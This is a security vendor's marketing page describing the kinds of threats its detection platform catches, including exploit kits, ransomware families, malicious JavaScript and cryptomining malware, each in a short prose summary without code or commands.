CYBER ADAPT DETECTION CAPABILITIES
Delivering Industry Leading Cybersecurity Detection Solutions
Here at CyberadAPT we leave no stone unturned when it comes to providing the most up to date and relevant detections in the ever-evolving threat landscape. That means we source detections from a variety of sources including reputable 3rd parties, open source feeds, dark web investigations, machine learning, and through emerging threat research and custom detection writing. Utilizing these sources we are able to achieve advanced detection capability via anomaly detection, heuristics, and behavioral analytics which allow our platform to catch even zero day threats early on in the threat life cycle. Below you will find some examples of the types of threats Cyber AdAPT is APT to detect in your environment.
Trojans and Viruses
A type of malicious code or software that looks legitimate but can take control of your computer. A trojan is designed to damage, disrupt, steal or in general inflict some other harmful action on your data or network. A computer virus is a type of malicious code or program written to alter the way a computer operates and is designed to spread from one computer to another.
Microsoft Tech Support Scam Landing Pages
Tech support scams are an industry-wide issue where scammers use scare tactics to trick users into paying for unnecessary technical support services that supposedly fix contrived device, platform, or software problems.
Learn More About Microsoft Tech Support Scams >
Wordpress Plugin Cross-Site Scripting
Cross-site scripting (XSS) is a security vulnerability typically found in web applications. It allows an attacker to execute potentially malicious script code in the website visitor’s browser.
Learn More About a WP Plugin that Mitigates XSS Threats >
FakeAV Landing Pages
Fake Anti-Virus (AV) software masquerades as a legitimate security product with the goal of deceiving victims into paying registration fees to seemingly remove malware from their device. Analysis of 240 million web pages collected by Google’s malware detection infrastructure over a 13 month period discovered over 11,000 domains involved in Fake AV distribution.
Read Google's Analysis of Fake Anti- Virus Distribution >
Malicious Javascript
Malicious Javascript does not require secondary user interaction to cause infection. Users can be infected by simply browsing to a vulnerable website. A recent study analyzing 133k websites demonstrated that 37% of those sites include at least one library with a known vulnerability. While JavaScript is the de-facto standard for developing client-side code on the Web, at the same time it is notorious for security vulnerabilities. Third-party modules such as advertising, trackers, social media or other widgets that are often embedded in JavaScript.
Learn More About How Companies are Hacked by Malicious JavaScript Code >
"Our team recently found a malicious JavaScript injection within the WordPress index.php theme file on a compromised WordPress website which ultimately redirects site visitors to a survey-for- gifts scam website. At this time of writing, we have seen over two thousand new infected sites since we started tracking this infection." - Luke Leal, Sucuri Blog
Exploits and Malware
An exploit is code or a program that exploits a weakness in an application or system. Malware is malicious software used in activity such as corrupting a system, demanding ransom, or steeling sensitive data.
Nuclear
Exploit kits are automated tools popular with cybercriminals to silently exploit vulnerabilities on victim's machines while they are browsing. The goal is to download and execute some type of malware. Nuclear is an exploit kit that checks for vulnerabilities in operating systems, web browsers, and browser plugins to allow them to launch an exploit specific to the identified vulnerability.
Underminer
Underminer is an exploit kit used by cybercriminals to infect systems with a cryptocurrency mining malware called Hidden Mellifera. Underminer uses RSA encryption to protect its exploit code and deter traffic from being replayed allowing it to hide its malicious content. Underminer represents the persistence and continued evolution of exploit kits despite not being the go-to tool for cyber criminals.
SunDown
What makes SunDown a particulary relevant threat is its capability of fileless malware infection. This is possible through its use of a PowerShell loader. The upgraded loader in this new version is now capable of collecting a profile of the victim’s environment and sending the information to the exploit kit server.
Rig
An exploit kit such as Rig usually starts off with a threat actor compromising a website to inject a malicious script/code that eventually redirects would-be victims to the exploit kit’s landing page.
Magnitude
Magnitude gained increased public attention after the kit was used in an advertising attack on Yahoo. Criminals purchased ad space on Yahoo, and used the ads to redirect visitors to domains hosting the Magnitude landing page. From there, the kit would attempt to exploit vulnerabilities in Java in order to deliver malware.
Learn More About Magnitude EK >
Exploring a Recent Magnitude Exploit Kit Sample >
Fallout
The Fallout exploit kit, first spotted in February by team nao sec, continues to infect users by weaponizing itself with various exploits hosted on GitHub. Most notably, it has been using the recent Flash Player exploit, CVE-2018-15982.
Learn More About CVE-2018-15982 >
Hunter
The Hunter exploit kit attempts to exploit victim's who visit malicious websites with various vulnerabilities found in Microsoft, Oracle, and Adobe. The Hunter exploit kit comes with a lower price tag than previously well-known EKs. This low-end tool with potential for high return makes it very attractive to cyber criminals looking to capitalize on known vulnerabilities.
Ransomware
Malicious software designed to block access to a computer system until a sum of money is paid.
Cryptowall
CryptoWall is a highly destructive piece of ransomware on Microsoft Windows that takes the user's data hostage with RSA-2048 encryption.
TeslaCrypt
TeslaCrypt was a ransomware trojan. It is now defunct, and its master key was released by the developers.
Buran
The VegaLocker malware strain has provided the base for new ransomware-as-a-service (RaaS) Buran which is taking on competitors through discounted rates.
Chimera
Chimera ransomware is distributed via malicious Dropbox links in phishing campaigns. When installed, it encrypts both local and network files. Chimera also attempts extortion on its victims.
WannaCry
The WannaCry ransomware attack was a May 2017 worldwide cyberattack by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency. It propagated through EternalBlue, an exploit developed by the United States National Security Agency (NSA) for older Windows systems.
Petya
Petya is a family of encrypting malware that was first discovered in 2016.[2] The malware targets Microsoft Windows–based systems, infecting the master boot record to execute a payload that encrypts a hard drive's file system table and prevents Windows from booting.
Troldesh
Troldesh, which has been around since 2014, is typically spread by malspam—specifically malicious email attachments. The attachments are usually zip files presented to the receiver as something he “has to” open quickly. The extracted zip is a Javascript that downloads the malicious payload (aka the ransomware itself). The payload is often hosted on sites with a compromised Content Management System (CMS).
GandCrab
First observed in January of 2018, GandCrab ransomware is a type of malware that encrypts victims’ files and demands ransom payment in order to regain access to their data. GandCrab targets consumers and businesses with PCs running Microsoft Windows.
Cryptocurrency Mining
Cryptocurrency mining, or cryptomining, is a process in which transactions for various forms of cryptocurrency are verified and added to the blockchain digital ledger. In the malware world, one of the more prevalent current threats is mining botnet infections, in which user systems mine for cryptocurrency without the owners' knowledge and funds are channeled to the botnet master.
BitCoinMiner
A Trojan.BitCoinMiner is a computer infection that silently runs on your computer while using your CPU or GPU resources to mine for digital currencies. As the value of cryptocurrencies, such as Bitcoin, rise, more and more criminals want to use your computer's resources to mine for them and generate revenue.
Learn More About BitCoinMiner >
Primecoin Miner
Primecoin Miner is a client used for distributed payment processing in a digital currency network. Unauthorised installations of Primecoin Miner can be used by remote attackers to earn commission for processing transactions.
Learn More About Primecoin Miner >
Monero Miner
A cybersecurity firm has discovered a new strain of Monero mining malware, which contains code that hides the miner from Task Manager.
Learn More About Monero Miner >
XMRig Miner
XMRig is an open sourced Monero CPU Miner that was released in May 2017. Later, it was modified by threat actors to mine Monero cryptocurrency. This miner exploits vulnerable Windows, IIS, and Linux servers to mine Monero.
Learn More About XMRig Miner >
Coinhive Miner
Multiple security firms recently identified cryptocurrency mining service Coinhive as the top malicious threat to Web users, thanks to the tendency for Coinhive’s computer code to be used on hacked Web sites to steal the processing power of its visitors’ devices.